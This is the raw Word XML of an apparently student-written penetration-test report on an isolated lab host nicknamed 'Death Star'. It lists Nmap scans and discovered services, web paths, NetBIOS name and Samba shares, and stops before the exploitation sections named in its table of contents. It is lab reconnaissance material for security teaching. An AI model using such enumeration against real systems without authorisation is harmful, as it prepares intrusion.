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CAE31" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="793F9E79" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="1FE7EB93" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="3E3D0204" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="5367D3B0" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="59D0339D" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="24B02EF4" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="029A918F" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="60674B09" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="75CE109D" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="7256240B" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="56A8839E" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E"/>
    <w:p w14:paraId="719C88B4" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E" w:rsidP="0049075E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="0049075E">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30E7AA2B" wp14:editId="3648491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665855" cy="2851150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides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075E">
        <w:t>DEATH STAR DATA ACQUISITION REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24527184" w14:textId="77777777" w:rsidR="0049075E" w:rsidRDefault="0049075E" w:rsidP="0049075E">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1CCA05" w14:textId="77777777" w:rsidR="00F5666E" w:rsidRDefault="00402358" w:rsidP="00402358">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Mason Soroka-Gill (SOROM2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F22405" w14:textId="507881EA" w:rsidR="0049075E" w:rsidRDefault="0049075E" w:rsidP="00F5666E">
      <w:pPr>
        <w:pStyle w:val="Subtitle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NZ"/>
        </w:rPr>
        <w:id w:val="13407372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F2BCE4" w14:textId="2D7977C9" w:rsidR="00A81612" w:rsidRDefault="00A81612">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="67BCB0CA" w14:textId="106E58F0" w:rsidR="00A44266" w:rsidRDefault="002547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\h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc49378174" w:history="1">
            <w:r w:rsidR="00A44266" w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Scope</w:t>
            </w:r>
            <w:r w:rsidR="00A44266">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00A44266">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00A44266">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc49378174 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00A44266">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00A44266">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00A44266">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="00A44266">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CD71511" w14:textId="259E8A68" w:rsidR="00A44266" w:rsidRDefault="00A442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75" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>IP Addresses and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054A" w14:textId="4EEDFDA4" w:rsidR="00A44266" w:rsidRDefault="00A442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76" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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D91B" w14:textId="0C785ED2" w:rsidR="00A44266" w:rsidRDefault="00A442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77" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Ports and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7F9B" w14:textId="76673D8A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78" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port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29E3" w14:textId="76C2A493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79" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 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CC5F" w14:textId="74069645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0" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 139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295C" w14:textId="3CC5EC2C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1" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 445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87E2" w14:textId="187E2F09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2" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 3306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E4A9" w14:textId="0B5D9AC7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3" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 6667 &amp; 6697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EF08" w14:textId="240285A9" w:rsidR="00A44266" w:rsidRDefault="00A442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4" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>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AABE5" w14:textId="20C2EA47" w:rsidR="00A44266" w:rsidRDefault="00A442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5" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 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D8D" w14:textId="7B9CFB74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6" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Drupal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1781" w14:textId="24A52BD4" w:rsidR="00A44266" w:rsidRDefault="00A442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7" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Payrollapp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7E51" w14:textId="0E993CAA" w:rsidR="00A44266" w:rsidRDefault="00A442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8" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 445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A3B9" w14:textId="5E8573D6" w:rsidR="00A44266" w:rsidRDefault="00A442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49378189" w:history="1">
            <w:r w:rsidRPr="000722F4">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Port 6667 &amp; 6697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_Toc49378189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54773" w14:textId="0A56AFD3" w:rsidR="00A81612" w:rsidRDefault="002547AB">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="29730FD7" w14:textId="218BA91D" w:rsidR="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="0049075E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73532AC1" w14:textId="40553A99" w:rsidR="0049075E" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc49374290"/>
      <w:bookmarkStart w:id="1" w:name="_Toc49378174"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="20B5C677" w14:textId="77777777" w:rsidR="00D72FFB" w:rsidRPr="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB"/>
    <w:p w14:paraId="6C8B40A6" w14:textId="717C903E" w:rsidR="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc49374291"/>
      <w:bookmarkStart w:id="3" w:name="_Toc49378175"/>
      <w:r>
        <w:t>IP Addresses and Domains</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="52B68D3D" w14:textId="658E613F" w:rsidR="00D72FFB" w:rsidRDefault="00D72FFB" w:rsidP="00D72FFB">
      <w:r>
        <w:t>The target host exists as a single IP within an isolated network. No other IP addresses were targeted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341094F6" w14:textId="77777777" w:rsidR="004076A9" w:rsidRDefault="00D72FFB" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r w:rsidRPr="00103461">
        <w:t>10.25.100.24</w:t>
      </w:r>
      <w:r w:rsidRPr="00103461">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00103461">
        <w:tab/>
        <w:t>death-star</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694F1C35" w14:textId="0F18B2FF" w:rsidR="00B5053C" w:rsidRPr="00103461" w:rsidRDefault="00B5053C" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00103461">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438D1A8" w14:textId="526252D5" w:rsidR="00D72FFB" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc49374292"/>
      <w:bookmarkStart w:id="5" w:name="_Toc49378176"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Scanning</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2110A938" w14:textId="46C0F989" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:r>
        <w:t>The following scans were performed on the target host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720267D9" w14:textId="74ED5268" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap full port scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F4A2E" w14:textId="21A5CC62" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap connect scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116A9E09" w14:textId="7D0CC13A" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap version detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F60917" w14:textId="1A6A23D5" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap default script scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292C3E60" w14:textId="571F36E1" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap discovery scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63892AEE" w14:textId="709E99C0" w:rsidR="00B5053C" w:rsidRDefault="00B5053C" w:rsidP="00B5053C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap vuln scrip</w:t>
      </w:r>
      <w:r w:rsidR="00FE7E46">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7D45E7" w14:textId="43D8DDEA" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc49374293"/>
      <w:bookmarkStart w:id="7" w:name="_Toc49378177"/>
      <w:r>
        <w:t>Ports and Versions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="71C62F6C" w14:textId="58D4AB7E" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc49374294"/>
      <w:bookmarkStart w:id="9" w:name="_Toc49378178"/>
      <w:r>
        <w:t>Port 22</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="71C3EB65" w14:textId="32584181" w:rsidR="00104729" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:r>
        <w:t>This port is running OpenSSH version 6.6.1p1 Ubuntu 2Ubuntu2.10</w:t>
      </w:r>
      <w:r w:rsidR="00F2489E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A68887F" w14:textId="07493ED1" w:rsidR="00300AFA" w:rsidRDefault="00104729" w:rsidP="00104729">
      <w:r>
        <w:t>As of the date of this report, there are no known remote vulnerabilities for this version of OpenSSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C243FB2" w14:textId="4CDFE8A6" w:rsidR="00780ECA" w:rsidRDefault="00780ECA" w:rsidP="00780ECA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc49374295"/>
      <w:bookmarkStart w:id="11" w:name="_Toc49378179"/>
      <w:r>
        <w:t>Port 80</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="44ECFC4D" w14:textId="7ED5BF69" w:rsidR="00780ECA" w:rsidRDefault="00780ECA" w:rsidP="00780ECA">
      <w:r>
        <w:t>This port is running Apache httpd version 2.4.7</w:t>
      </w:r>
      <w:r w:rsidR="00F2489E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691D1F45" w14:textId="0B3C7325" w:rsidR="00F2489E" w:rsidRDefault="00F2489E" w:rsidP="00780ECA">
      <w:r>
        <w:t>As of the date of this report, there are no known remote vulnerabilities for this version of Apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2919FD74" w14:textId="63695469" w:rsidR="00F2489E" w:rsidRDefault="00F2489E" w:rsidP="00780ECA">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:r w:rsidR="006B333A">
        <w:t>scripts were able to discover the following subdirectories and files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00862A19" w14:textId="355B70A8" w:rsidR="00F2489E" w:rsidRDefault="00857ADD" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/drupal/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40103243" w14:textId="3A632CCD" w:rsidR="00F2489E" w:rsidRDefault="00857ADD" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/payroll_app.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="453BA15E" w14:textId="50484047" w:rsidR="00F2489E" w:rsidRDefault="00857ADD" w:rsidP="006B333A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/phpmyadmin/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05CBAB4C" w14:textId="2263F4D5" w:rsidR="00F2489E" w:rsidRDefault="00857ADD" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/uploads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A695CE8" w14:textId="01FF2665" w:rsidR="00F2489E" w:rsidRDefault="00857ADD" w:rsidP="00F2489E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00F2489E" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/chat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1457823E" w14:textId="1D51AD82" w:rsidR="00300AFA" w:rsidRPr="00BD55B3" w:rsidRDefault="00857ADD" w:rsidP="00EA1F79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3" w:history="1">
        <w:r w:rsidR="006B333A" w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.25.100.24:80/icons/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F34B023" w14:textId="535617C3" w:rsidR="00CB502F" w:rsidRPr="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00CB502F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc49378180"/>
      <w:r>
        <w:t>Port 139</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="254972D6" w14:textId="582F265C" w:rsidR="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00CB502F">
      <w:r>
        <w:t>This port is the NetBIOS port, often used in SMB/Samba systems as part of an LDAP environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF6952" w14:textId="5F1323B1" w:rsidR="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00CB502F">
      <w:r>
        <w:t xml:space="preserve">Nmap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nbstat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> script was able to enumerate the NetBIOS name of the host:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C04E6FB" w14:textId="73C97619" w:rsidR="00CB502F" w:rsidRDefault="00CB502F" w:rsidP="00A61FAB">
      <w:pPr>
        <w:pStyle w:val="Monospace"/>
      </w:pPr>
      <w:r>
        <w:t>DEATH-STAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C49126" w14:textId="0059FF81" w:rsidR="00930AEE" w:rsidRDefault="00930AEE" w:rsidP="00930AEE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc49378181"/>
      <w:r>
        <w:t>Port 445</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="17ABB1DC" w14:textId="5F6783A2" w:rsidR="00930AEE" w:rsidRDefault="00930AEE" w:rsidP="00930AEE">
      <w:r>
        <w:t xml:space="preserve">This port is running Linux Samba version </w:t>
      </w:r>
      <w:r w:rsidRPr="00930AEE">
        <w:t>4.3.11-Ubuntu</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AACFC66" w14:textId="0328830B" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:r>
        <w:t>Nmap scripts found the following shares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C062FE" w14:textId="0A5F2CB6" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.25.100.24\IPC$</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0042F8E5" w14:textId="3A092215" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>IPC service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D610A" w14:textId="747A82CA" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B228A45" w14:textId="2E061BF2" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.25.100.24\print$</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B6AD933" w14:textId="1C32871A" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5975A5B8" w14:textId="5B213D61" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/var/lib/samba/printers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC26497" w14:textId="54F6D843" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00646608">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>\\10.25.100.24\public</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6F0D1899" w14:textId="616F9C12" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Web share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C339F4" w14:textId="1B3FAB6F" w:rsidR="00BD55B3" w:rsidRDefault="00BD55B3" w:rsidP="00BD55B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>/var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054525C3" w14:textId="77777777" w:rsidR="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00CB502F"/>
    <w:p w14:paraId="05BC5E98" w14:textId="77777777" w:rsidR="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc49378182"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port 3306</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="346168C8" w14:textId="4E0E9375" w:rsidR="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, cannot be connected to remotely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203BC260" w14:textId="18DFDD75" w:rsidR="00BA2A73" w:rsidRDefault="00BA2A73" w:rsidP="00BA2A73">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc49378183"/>
      <w:r>
        <w:t>Port 6667 &amp; 6697</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
